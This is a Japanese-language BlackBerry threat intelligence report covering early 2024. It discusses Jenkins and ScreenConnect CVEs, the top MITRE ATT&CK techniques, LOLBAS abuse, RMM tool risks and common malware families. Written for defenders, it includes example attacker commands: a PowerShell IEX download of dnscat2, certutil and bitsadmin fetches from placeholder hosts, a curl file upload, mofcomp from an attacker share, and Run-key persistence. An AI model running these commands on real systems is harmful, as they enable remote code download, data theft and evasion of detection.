Jenkins の任意のファイル読み取りの脆弱性
CVE-2024-23897 (9.7 重大)
リモートコード実行
Jenkins の以前のバージョン (2.441 まで、およびそれ以前の LTS 2.426.2) には、組み込みのコマンド ライン インターフェイスを介して Jenkins コントローラー ファイル システムに見つかった脆弱性が含まれています。これは、引数内のファイル パスの前にある「@」文字をファイルの内容に置き換える機能を持つargs4j ライブラリ内に見つかります。34 これにより、攻撃者はファイル システム上の任意のファイルを読み取ることができ、リモート コード実行につながる可能性があります。
ConnectWise ScreenConnect 23.9.7 の脆弱性
CVE-2024-1709 (10 重大); CVE-2024-1708 (8.4 高)
リモートコード実行
この脆弱性は、ConnectWise ScreenConnect 23.9.7 製品に影響します。攻撃者は、これらの 脆弱性の両方 を悪用しているのが確認されています。両方とも相互に連携して機能し、CVE-2024-1709 (重大な認証バイパスの脆弱性) により、攻撃者は管理者アカウントを作成し、CVE-2024-1708 (パス トラバーサルの脆弱性) を悪用して、被害者のファイルやディレクトリに不正アクセスできるようになります。
一般的なMITREテクニック
脅威グループの高度な手法を理解することは、どの検出手法を優先すべきかを判断するのに役立ちます。BlackBerry は、このレポート期間中に脅威アクターが使用した上位 20 の手法を次のように確認しました。
最後の列の上向き矢印は、前回のレポート以降にその技術の使用が増加したことを示し、下向き矢印は使用が減少したことを示し、等号 (=) 記号は、その技術が前回のレポートと同じような使用頻度であることを意味します。
| Technique Name | Technique ID | Tactic Name | Last Report | Change |
|---|---|---|---|---|
|
Process Injection
|
T1055
|
Privilege Escalation, Defense Evasion
|
1
|
=
|
|
System Information Discovery
|
T1082
|
Discovery
|
3
|
↑
|
|
DLL Side-Loading
|
T1574.002
|
Persistence, Privilege Escalation, Defense Evasion
|
4
|
↑
|
|
Input Capture
|
T1056
|
Credential Access, Collection
|
2
|
↓
|
|
Security Software Discovery
|
T1518.001
|
Discovery
|
NA
|
↑
|
|
Masquerading
|
T1036
|
Defense Evasion
|
10
|
↑
|
|
File and Directory Discovery
|
T1083
|
Discovery
|
13
|
↑
|
|
Process Discovery
|
T1057
|
Discovery
|
19
|
↑
|
|
Application Layer Protocol
|
T1071
|
Command-and-control
|
6
|
↓
|
|
Registry Run Keys/Startup Folder
|
T1547.001
|
Persistence, Privilege Escalation
|
9
|
↓
|
|
Non-Application Layer Protocol
|
T1095
|
Command-and-control
|
5
|
↓
|
|
Remote System Discovery
|
T1018
|
Discovery
|
15
|
↑
|
|
Application Window Discovery
|
T1010
|
Discovery
|
NA
|
↑
|
|
Software Packing
|
T1027.002
|
Defense Evasion
|
NA
|
↑
|
|
Scheduled Task/Job
|
T1053
|
Execution, Persistence, Privilege Escalation
|
8
|
↓
|
|
Windows Service
|
T1543.003
|
Persistence, Privilege Escalation
|
12
|
↓
|
|
Disable or Modify Tools
|
T1562.001
|
Defense Evasion
|
18
|
↑
|
|
Command and Scripting Interpreter
|
T1059
|
Execution
|
7
|
↓
|
|
Obfuscated Files or Information
|
T1027
|
Defense Evasion
|
NA
|
↑
|
|
Replication Through Removable Media
|
T1091
|
Initial Access, Lateral Movement
|
11
|
↓
|
| Technique ID | |
|---|---|
| Process Injection |
T1055
|
| System Information Discovery |
T1082
|
| DLL Side-Loading |
T1574.002
|
| Input Capture |
T1056
|
| Security Software Discovery |
T1518.001
|
| Masquerading |
T1036
|
| File and Directory Discovery |
T1083
|
| Process Discovery |
T1057
|
| Application Layer Protocol |
T1071
|
| Registry Run Keys/Startup Folder |
T1547.001
|
| Non-Application Layer Protocol |
T1095
|
| Remote System Discovery |
T1018
|
| Application Window Discovery |
T1010
|
| Software Packing |
T1027.002
|
| Scheduled Task/Job |
T1053
|
| Windows Service |
T1543.003
|
| Disable or Modify Tools |
T1562.001
|
| Command and Scripting Interpreter |
T1059
|
| Obfuscated Files or Information |
T1027
|
| Replication Through Removable Media |
T1091
|
| Tactic Name | |
|---|---|
| Process Injection |
Privilege Escalation, Defense Evasion
|
| System Information Discovery |
Discovery
|
| DLL Side-Loading |
Persistence, Privilege Escalation, Defense Evasion
|
| Input Capture |
Credential Access, Collection
|
| Security Software Discovery |
Discovery
|
| Masquerading |
Defense Evasion
|
| File and Directory Discovery |
Discovery
|
| Process Discovery |
Discovery
|
| Application Layer Protocol |
Command-and-control
|
| Registry Run Keys/Startup Folder |
Persistence, Privilege Escalation
|
| Non-Application Layer Protocol |
Command-and-control
|
| Remote System Discovery |
Discovery
|
| Application Window Discovery |
Discovery
|
| Software Packing |
Defense Evasion
|
| Scheduled Task/Job |
Execution, Persistence, Privilege Escalation
|
| Windows Service |
Persistence, Privilege Escalation
|
| Disable or Modify Tools |
Defense Evasion
|
| Command and Scripting Interpreter |
Execution
|
| Obfuscated Files or Information |
Defense Evasion
|
| Replication Through Removable Media |
Initial Access, Lateral Movement
|
| Last Report | |
|---|---|
| Process Injection |
1
|
| System Information Discovery |
3
|
| DLL Side-Loading |
4
|
| Input Capture |
2
|
| Security Software Discovery |
NA
|
| Masquerading |
10
|
| File and Directory Discovery |
13
|
| Process Discovery |
19
|
| Application Layer Protocol |
6
|
| Registry Run Keys/Startup Folder |
9
|
| Non-Application Layer Protocol |
5
|
| Remote System Discovery |
15
|
| Application Window Discovery |
NA
|
| Software Packing |
NA
|
| Scheduled Task/Job |
8
|
| Windows Service |
12
|
| Disable or Modify Tools |
18
|
| Command and Scripting Interpreter |
7
|
| Obfuscated Files or Information |
NA
|
| Replication Through Removable Media |
11
|
| Change | |
|---|---|
| Process Injection |
=
|
| System Information Discovery |
↑
|
| DLL Side-Loading |
↑
|
| Input Capture |
↓
|
| Security Software Discovery |
↑
|
| Masquerading |
↑
|
| File and Directory Discovery |
↑
|
| Process Discovery |
↑
|
| Application Layer Protocol |
↓
|
| Registry Run Keys/Startup Folder |
↓
|
| Non-Application Layer Protocol |
↓
|
| Remote System Discovery |
↑
|
| Application Window Discovery |
↑
|
| Software Packing |
↑
|
| Scheduled Task/Job |
↓
|
| Windows Service |
↓
|
| Disable or Modify Tools |
↑
|
| Command and Scripting Interpreter |
↓
|
| Obfuscated Files or Information |
↑
|
| Replication Through Removable Media |
↓
|
BlackBerry の脅威調査およびインテリジェンス チームは、 MITRE D3FEND ™を使用して、このレポート期間中に観察された手法に対する完全な対策リストを作成しました。このリストは、当社の公開 GitHubで入手できます。
上位3つの手法は、攻撃を成功させるために重要な情報を収集するために敵が使用するよく知られた手順です。「適用された対策」 セクションには、その使用例と監視に役立つ情報がいくつか含まれています。
技術と戦術の合計の影響は、以下のグラフで確認できます。
注目のMITREテクニックに対する適用された対策
-
セキュリティ ソフトウェア検出 – T1518.001
この一般的な手法により、サイバー脅威の攻撃者は、標的のシステムまたはクラウド環境にインストールされているセキュリティ プログラム、構成、センサーのリストを見つけることができます。これは、検出されないことを望む攻撃者にとって非常に重要です。たとえば、悪意のあるグループが侵害されたシステムで以下にリストされているコマンドの 1 つを実行し、その環境に悪意のあるアクティビティを検出するためのセキュリティがすでに適用されていることを検出すると、多くの場合、操作を中止します。他のケースでは、より高度で永続的なグループは、セキュリティ アプリケーションを区別し、弱いアプリケーションを回避する方法を見つけることができます。これにより、攻撃者がシステムまたはクラウド環境を制御できるようになります。
以下は、攻撃者がセキュリティを評価するために使用する可能性のあるコマンドラインです。
- netsh ファイアウォール 表示
- netsh.exe インターフェース ダンプ
- findstr /s /m /i "ディフェンダー" *.*
- タスクリスト /v
- Powershell Empire モジュール Get-AntiVirusProduct
- cmd.exe WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
-
マスカレード – T1036
これは、攻撃者が活動を偽装し、検出を回避するために使用する高度なサイバー脅威戦術です。たとえば、偽の名前、アイコン、メタデータを使用すると、有害なアクションを通常のシステム操作に簡単に偽装できます。正当なファイルまたはプロセスを偽装すると、ユーザーやセキュリティソフトウェアが偽のファイルを開いたり保存したりするように誘導され、システムへの侵入やデータ損失につながる可能性があります。(偽装方法の特定方法の詳細については、 このレポートの「CylanceMDR 観察」 セクションを参照してください。
一般的な偽装方法の内訳は次のとおりです。
- 実行可能ファイルの名前変更: 攻撃者は、悪意のある実行可能ファイルの名前を変更して、正当なシステム プログラム (例: svchost.exe、explorer.exe) であるかのように見せかけたり、.txt.doc や .exe.config などの別の偽の拡張子を変更または追加して、実際のファイルの種類を隠したりすることがあります。その目的は、手動または自動のシステム チェックを実行するときにユーザーとセキュリティ ツールを騙し、ユーザーがシステム警告を無視して悪意のあるファイルを実行したり開こうとしたりすることです。
- ファイル パスの模倣: 一般的に信頼されているディレクトリ (例: System32) では、セキュリティ ツールによる監視や検出が少なくなります。そのため、攻撃者は悪意のあるファイルをこれらのディレクトリに配置し、正当なプロセス名を付けて隠すことがよくあります。
- 無効なコード署名: 攻撃者は、セキュリティ対策を回避するために、無効または盗まれたデジタル証明書を使用してマルウェアに署名することがあります。これにより、システムやユーザーは、悪意のあるファイルやプロセスが正当なソースによって検証されているかのように見せかけ、それらを信頼するようになります。攻撃者は、期限切れ、取り消された、または不正に取得された証明書を使用する可能性があります。このような戦術を識別するには、強力な証明書検証プロセスと、異常な証明書データや検証の失敗をフラグ付けできる警告システムが必要です。たとえば、cmd.exe を電卓アプリに見せかけるには、次のように
コピーします。c:\windows\system32\cmd.exe C:\calc.exe
-
ファイルとディレクトリの検出 – T1083
ファイルとディレクトリの検出は、攻撃者の偵察段階で、ターゲット環境の洞察を得たり、流出や操作の対象となる可能性のあるファイルを識別したり、機密情報を見つけたり、攻撃チェーンの次の段階をサポートしたりするために頻繁に使用されます。
この手法で使用されるコマンド ラインは次のとおりです。
- 'dir /s C:\path\to\directory' – dir ユーティリティを使用して、特定のディレクトリとそのサブディレクトリ内のファイルとディレクトリを再帰的に一覧表示します。
- 'tree /F' – tree ユーティリティを使用して、ディレクトリ ツリーとともに各ディレクトリ内のファイル名を表示します。
- 'powershell.exe -c "Get-ChildItem C:\path\to\directory"' – 指定されたパス内のファイルとディレクトリの一覧を取得する Get-ChildItem コマンドレットを PowerShell に実装します。
脅威アクターは、ネイティブの Windows API 関数を使用してファイルとディレクトリを列挙することもあります。脅威アクターが使用する Windows API 関数は次のとおりです。
- FindFirstFile – 指定されたファイル名またはディレクトリ名のパターンに一致する最初のファイルまたはディレクトリに関する情報を取得します。
- FindNextFile – 以前の FindFirstFile 関数の呼び出しによって開始されたファイル検索を続行します。
- PathFileExists – 指定されたディレクトリまたはファイルが存在するかどうかを確認します。
-
アプリケーション層プロトコル – T1071
脅威アクターは、検出を回避するために、正当なトラフィック内に自分たちの行動を隠す新しい方法を常に模索しています。アプリケーション層プロトコル操作 (T1071) は、よく使われる手法です。2024 年の最初の 3 か月間で、この手法は悪意のあるアクターが使用する上位 5 つの戦術の 1 つとして浮上しました。攻撃者は、HTTP、HTTPS、DNS、SMB などの一般的に使用されるネットワーク プロトコルの脆弱性を悪用することで、悪意のあるアクティビティを日常的なネットワーク トラフィックにシームレスに組み込むことができます。
この手法は、データを盗み出し、C2 通信を可能にし、侵害されたネットワーク内で横方向に移動するために使用できます。たとえば、攻撃者は HTTP ヘッダー内に機密データをエンコードしたり、DNS トンネリングを利用してネットワーク防御を回避し、疑いを持たれずに情報を抽出したりすることができます。アプリケーション層プロトコル操作のステルス性により、多くの従来のセキュリティ ツールが通常のネットワーク アクティビティと悪意のあるネットワーク アクティビティを区別するのに苦労しているため、検出と帰属の特定に大きな課題が生じます。
この手法が広く普及し、高度化していることを考えると、組織は防御を強化するために積極的な対策を講じる必要があります。堅牢なネットワーク監視ソリューションは、異常なトラフィック パターンを検出し、アプリケーション層プロトコルの操作に関連する疑わしい動作を通常のユーザー アクティビティと正確に区別できる必要があります。
さらに、ネットワーク プロトコルとアプリケーションのセキュリティ パッチを最新に保つことで、既知の脆弱性や悪用を軽減できます。エンドポイント検出および対応 (EDR) ソリューションを実装することで、組織はアプリケーション層プロトコルの操作を通じて実行される悪意のあるアクティビティを特定して対応する能力を高め、全体的なサイバーセキュリティ体制を強化できます。
以下は、脅威アクターが使用する APL コマンドです: curl -F "file=@C:\Users\tester\Desktop\test[.]txt 127[.]0[.]0[.]1/file/upload
powershell IEX (New-Object System.Net.Webclient).DownloadString('hxxps://raw[.]git hubusercontent[.]com/lukebaggett/dnscat2-powershell/master/dnscat2[.]ps1' -
レジストリ実行キー / スタートアップ フォルダー – T1547.001
レジストリ実行キー/スタートアップ フォルダーの操作は、侵害されたシステムで永続性を確立するために攻撃者が使用する手法です。この手法は、このレポート期間中にサイバー脅威アクターが使用した上位の戦術の中で特に目立っていました。Windows レジストリ キーを改ざんしたり、スタートアップ フォルダーに悪意のあるエントリを追加したりすることで、攻撃者はシステムの起動時またはユーザー ログイン時に悪意のあるペイロードが自動的に実行されるようにし、侵害されたシステムを継続的に制御できるようにします。
この手法により、攻撃者はバックドア、キーロガー、ランサムウェアなど、さまざまなマルウェアを展開し、侵害されたシステムへの永続的なアクセスを維持できます。攻撃者は Windows のネイティブ機能を悪用して検出を回避します。正当なシステム構成の悪用により、従来の AV ソリューションではこれらの脅威の検出と軽減がより困難になります。
レジストリ実行キーとスタートアップ フォルダーの操作によってもたらされる脅威に対抗するには、組織はエンドポイント セキュリティに対して多層アプローチを採用する必要があります。
- 悪意のあるアクティビティを示す不正な変更を検出するために、Windows レジストリ キーとスタートアップ フォルダーを定期的に監視および監査します。
- 不正な実行ファイルを防ぐために、アプリケーションのホワイトリストを実装します。
- 権限管理コントロールを設定して、攻撃者が重要なシステム構成を操作する能力を制限します。
- ユーザー教育および意識向上プログラムを実施して、従業員が疑わしいスタートアップ項目やレジストリの変更を認識して報告できるようにします。
- 全体的な脅威検出および対応機能を強化します。
注意すべきコマンドには次のようなものがあります。
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Test /t REG_SZ /d "Test McTesterson"
echo "" > "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\file[.]txt"
CylanceMDR データ
レポートのこのセクションでは、CylanceMDR の顧客環境で観察された最も一般的な脅威検出のいくつかについて説明します。
CylanceMDR(旧称 CylanceGUARD ® )は、BlackBerry が提供するサブスクリプションベースのマネージド検出および対応 (MDR) サービスです。24 時間 365 日の監視を提供し、顧客のセキュリティ プログラムのギャップを悪用する高度なサイバー脅威を組織が阻止できるよう支援します。CylanceMDR チームは、このレポート期間中に数千件のアラートを追跡しました。以下では、現在の脅威の状況に関する追加の洞察を提供するために、テレメトリを地域別に分類しています。
CylanceMDR による見解
このレポート期間中、CylanceMDR チームは、Certutilがセキュリティ オペレーション センター (SOC) 内で多くの検出アクティビティ、つまり Certutil などのツールの名前変更に関連する手法 (例: 「Certutil の名前変更実行の可能性」) を促進していることを確認しました。BlackBerry が顧客を保護しているすべての地域で、これに関連する検出が急増しました。
前回のレポートでは、CertutilなどのLOLBAS(Living-Off-The-Land)バイナリとスクリプトユーティリティが脅威アクターによって悪用または誤用される方法について説明しました。脅威アクターは、検出機能を回避するために、正規のユーティリティ(Certutilなど)の名前を変更することがよくあります。これは、マスカレードは、MITRE Technique ID: T1036.003 です。防御側は、マスカレードなどの回避テクニックのリスクを最小限に抑えるために、堅牢な検出機能を導入する必要があります。たとえば、コマンドCertutil (およびこのツールで悪用される可能性のあるオプション/引数) を検出した場合にのみトリガーされる検出ルールを作成すると、簡単に回避できます。
たとえば、以下の 2 つのコマンドを見てみましょう:
certutil.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txt検出機能が
certutilコマンド (およびそのオプション) のみに依存している場合、これは検出されますが、簡単に回避できるため、弱い保護と見なされます。
outlook.exe -urlcache -split -f "hxxps://bbtest/badFile[.]txt" bad[.]txtこの場合、
certutil.exe の名前をoutlook.exeに
変更したため、検出は完全に回避されます (上記のロジックを使用する場合)。
より良い解決策としては、元のファイル名 (コンパイル時に提供される内部ファイル名) などのポータブル実行可能 (PE) ファイル/プロセス メタデータが収集され、検出機能に統合されるようにすることです。ディスク上のファイル名とバイナリの PE メタデータが一致しない場合は、バイナリがコンパイル後に名前変更されたことを示す良い指標となります。
LOLBASの活動
この報告期間中、当社の顧客環境内で確認された LOLBAS アクティビティに変化が見られました。
- regsvr32.exeに関連する検出の増加。
- mshta.exe 関連のアクティビティが減少しました。
- bitsadmin.exe に関連する検出が大幅に増加しました。
以下は、悪意のある LOLBAS の使用例です (前回の報告期間中に共有されたものは除く)。
ファイル: Bitsadmin.exe
Mitre: T1197 | T1105
悪用される可能性:
- 悪意のあるホストからのダウンロード/アップロード(Ingress ツール転送)
- 悪意のあるプロセスを実行するために使用される可能性がある
コマンド例:
bitsadmin /transfer defaultjob1 /download hxxp://baddomain[.]com/bbtest/bbtest C:\Users\<user>\AppData\Local\Temp\bbtest
ファイル: mofcomp.exe
Mitre: T1218
悪用される可能性:
- 悪意のある管理オブジェクトフォーマット(MOF)スクリプトをインストールするために使用できる
- MOFステートメントはmofcomp.exeユーティリティによって解析され、ファイルで定義されたクラスとクラスインスタンスをWMIリポジトリに追加します。
コマンド例:
mofcomp.exe \\<AttackkerIP>\content\BBwmi[.]mof
リモート監視および管理 (RMM) ツールは、マネージド IT サービス プロバイダー (MSP) によってクライアントのエンドポイントをリモートで監視するために頻繁に使用されます。残念ながら、RMM ツールを使用すると、脅威アクターが同じシステムにアクセスすることもできます。これらのツールは多数の管理機能を備えており、脅威アクターが信頼できる承認済みツールを使用して紛れ込む方法を提供します。
2023年には、2023年9月のMGMリゾーツインターナショナル攻撃の背後にいると考えられているサイバー攻撃グループであるScattered Spiderに関連する報告により、RMMツールの悪用が焦点となりました。Scattered Spiderのメンバーは洗練されたソーシャルエンジニアリングの専門家であると考えられており、SIMスワップ攻撃、フィッシング、プッシュ爆撃などのさまざまな手法を展開しています。彼らは攻撃中に次のようなさまざまなRMMツールを使用してきました。
- スプラッシュトップ
- チームビューア
- スクリーンコネクト
2024 年の最初の報告期間の時点で、ConnectWise ScreenConnect (23.9.8 未満のすべてのバージョン)で 2 つの脆弱性が発見されて以来、RMM ツールに対する注目は高いままです。CVE の詳細は以下をご覧ください。
CVE-2024-1709
CWE-288: 代替パスまたはチャネルを使用した認証バイパス。
CVE-2024-1708
CWE-22: 制限されたディレクトリへのパス名の不適切な制限(「パストラバーサル」)。
以下のグラフは、このレポート期間中に観察された最も一般的な RMM ツールを示しています。
分析中に、多くの顧客が複数の RMM ツールを使用しているため、組織の攻撃対象領域とリスクが増加していることがわかりました。推奨される緩和策は次のとおりです。
リモート アクセス ツール (RMM ツール) の監査
- 環境内で現在使用されている RMM ツールを識別します。
- 環境内で承認されていることを確認します。
- 複数の RMM ツールを使用している場合は、それらを統合できるかどうかを判断します。使用するツールの数を減らすと、リスクが軽減されます。
ポートとプロトコルを無効にする
- 承認されていないリモート アクセス ツールに関連付けられた一般的に使用されるポートへの受信および送信のネットワーク通信をブロックします。
定期的にログを監査する
- リモート アクセス ツールの異常な使用を検出します。
パッチ適用
- 使用されている RMM ツールに関連する脆弱性を定期的に確認し、必要に応じて更新します。
- 定期的なパッチ サイクルを実行するときは、RMM ツールなどのインターネットでアクセス可能なソフトウェアを常に優先する必要があります。
ネットワークセグメンテーション
- ネットワークをセグメント化し、デバイスとデータへのアクセスを制限することで、横方向の移動を最小限に抑えます。
デバイスのタグ付け
- セキュリティ ベンダーが、RMM ツールを使用するデバイスにタグを付けるオプションを提供しているかどうかを確認します。提供している場合は、これを有効にして、SOC が確実に認識できるようにします。ベンダーによっては、承認されたツールやアクティビティを識別するメモやタグを残すオプションを提供しており、これは調査中のアナリストにとって非常に役立ちます。
メモリロードRMM
- メモリにのみロードされるリモート アクセスを検出できるセキュリティ ソフトウェアを使用します。
結論
この 90 日間のレポートは、将来の脅威に対する知識と準備を維持するのに役立つように設計されています。急速に変化するサイバーセキュリティの脅威の状況に対処するには、業界、地域、主要な問題に関する最新のセキュリティ ニュースを常に把握しておくことが役立ちます。2024 年 1 月から 3 月までの主なポイントは次のとおりです。
- 社内の攻撃阻止テレメトリによると、BlackBerry は世界中で、テナントを狙った1 日あたり 37,000 件の攻撃 を阻止しました。テナントや顧客を狙ったマルウェアの数は大幅に増加し、前回の報告期間に比べて1 分あたり 40% 増加しました。これは、脅威アクターが被害者を慎重に狙うために広範囲にわたる対策を講じていることを示唆している可能性があります。
- 情報摂取型マルウェア(インフォスティーラー)は、重要なインフラストラクチャ、商業企業、および主要な脅威のセクションで目立っていました。これは、機密データや個人データが、あらゆる地域や業界の脅威アクターによって強く求められていることを示しています。
- 最も注目すべきランサムウェア グループを説明する新しいランサムウェア セクションで強調されているように、ランサムウェアは重要なインフラストラクチャ、特に医療を標的とするケースが増えています。
- CVE の悪用は昨年急速に拡大しており、今後も拡大し続けるでしょう。BlackBerryは、過去 3 か月間に NIST によって公開された約 9,000 件の新しい CVE を記録しました。さらに、公開されたこれらの脆弱性の 56% 以上が、深刻度が 7.0 を超えています。ConnectWise ScreenConnect、GoAnywhere、および複数の正規の Ivanti 製品など、頻繁に使用される正規ソフトウェアに関連するエクスプロイトは、脅威アクターによって驚くべき速度で武器化され、パッチが適用されていない被害者のマシンにさまざまなマルウェアを送り込んでいます。
- ディープフェイクや誤報による政治的欺瞞はソーシャルメディアを通じてますます広まっており、特にロシアのウクライナ侵攻、進行中の中東紛争、そして11月に行われる米国大統領選挙に関連して、今後も問題となり続けると思われます。
主要なサイバーセキュリティの脅威と防御に関する詳細については、BlackBerry ブログをご覧ください。
謝辞
このレポートは、当社の優秀なチーム及び個人の共同作業の成果です。特に、次のメンバーには感謝したく思います。
付録: 重要なインフラストラクチャと商業企業への脅威
8Base ランサムウェア: 2023 年に初めて確認された、特に攻撃的なランサムウェア グループです。このグループは、その短い歴史の中で非常に活発に活動しており、北米やラテンアメリカ諸国の被害者を標的にすることが多かったです。この脅威グループは、さまざまな戦術を組み合わせて初期アクセスを獲得し、被害者のシステムの脆弱性を悪用して、潜在的な支払いを最大化する可能性があります。
Amadey (Amadey Bot):モジュール設計の多機能ボットネット。被害者のデバイスに侵入すると、Amadey は C2 サーバーからコマンドを受信して、情報の盗難や追加のペイロードの展開など、さまざまなタスクを実行します。
Buhti:比較的新しいランサムウェア活動であるBuhtiは、漏洩したLockBit 3.0(別名LockBit Black)およびBabukランサムウェアファミリーの亜種を利用して、WindowsおよびLinuxシステムを攻撃します。さらに、Buhtiは、特定の拡張子を持つファイルを盗むために設計された「Go」プログラミング言語で書かれたカスタムデータ抽出ユーティリティを使用することが知られています。ランサムウェアオペレーターは、IBMのAspera Faspexファイル交換アプリケーション(CVE-2022-47986)に影響を与える他の深刻なバグや、最近修正されたPaperCutの脆弱性(CVE-2023-27350)を迅速に悪用していることも確認されています。
LummaStealer (LummaC2):商業企業や重要なインフラストラクチャ組織をターゲットとする C ベースのインフォスティーラーで、被害者のデバイスから個人情報や機密データを盗み出すことに重点を置いています。このインフォスティーラーは、地下フォーラムや Telegram グループを通じて宣伝および配布されることが多く、トロイの木馬やスパムを利用して拡散することがよくあります。
PrivateLoader: 2021 年から出回っている悪名高いダウンローダー ファミリで、主に北米の商業企業をターゲットにしています。PrivateLoader (その名前が示すように) は初期アクセス メカニズムであり、被害者のデバイスに多数の悪意のあるペイロード (つまりインフォスティーラー) を展開することを容易にします。PrivateLoader は、アンダーグラウンドのペイパーインストール (PPI) サービスを介して配布ネットワークを運営し、継続的な使用と開発に資金を提供しています。
RaccoonStealer: MaaS インフォスティーラー。2019 年から出回っている RaccoonStealer の開発者は、セキュリティ ソフトウェアや従来の AV ソフトウェアを回避する機能を強化しています。BlackBerry の内部テレメトリによると、RaccoonStealer は北米の商業企業を標的にしていることが確認されています。
RedLine (RedLine Stealer):広く配布されているマルウェアインフォ スティーラーで、MaaS 経由で販売されることが多い。このマルウェアを配布する脅威グループの主な動機は、政治、破壊、スパイ活動ではなく、主に金銭的利益であるように思われます。RedLine がさまざまな業界や地域を積極的にターゲットにしているのはこのためです。
Remcos (RemcosRAT):コンピュータやデバイスをリモート制御するために使用される商用グレードの RAT。正規のソフトウェアとして宣伝されていますが、リモート制御および監視ソフトウェアはリモート アクセス トロイの木馬としてよく使用されます。
SmokeLoader:被害者のデバイスに他のマルウェアを展開するなど、さまざまな機能を備えた、一般的に利用されるマルウェアです。SmokeLoader は、複数のグローバル脅威インテリジェンス レポートを通じて BlackBerry が繰り返し確認している脅威です。このレポート期間中、このマルウェアは北米内の商用および専門サービスを標的にしていることがわかりました。
Vidar (VidarStealer): 2018 年から出回っている商用インフォスティーラーで、高度に武器化されたマルウェア ファミリに進化しました。攻撃者は、ConnectWise の人気の ScreenConnect RRM ソフトウェアの脆弱性を悪用して Vidar を展開することができました。これら 2 つの CVE、CVE-2024-1708 と CVE-2024-1709 により、脅威アクターは重要なシステムをバイパスしてアクセスできるようになりました。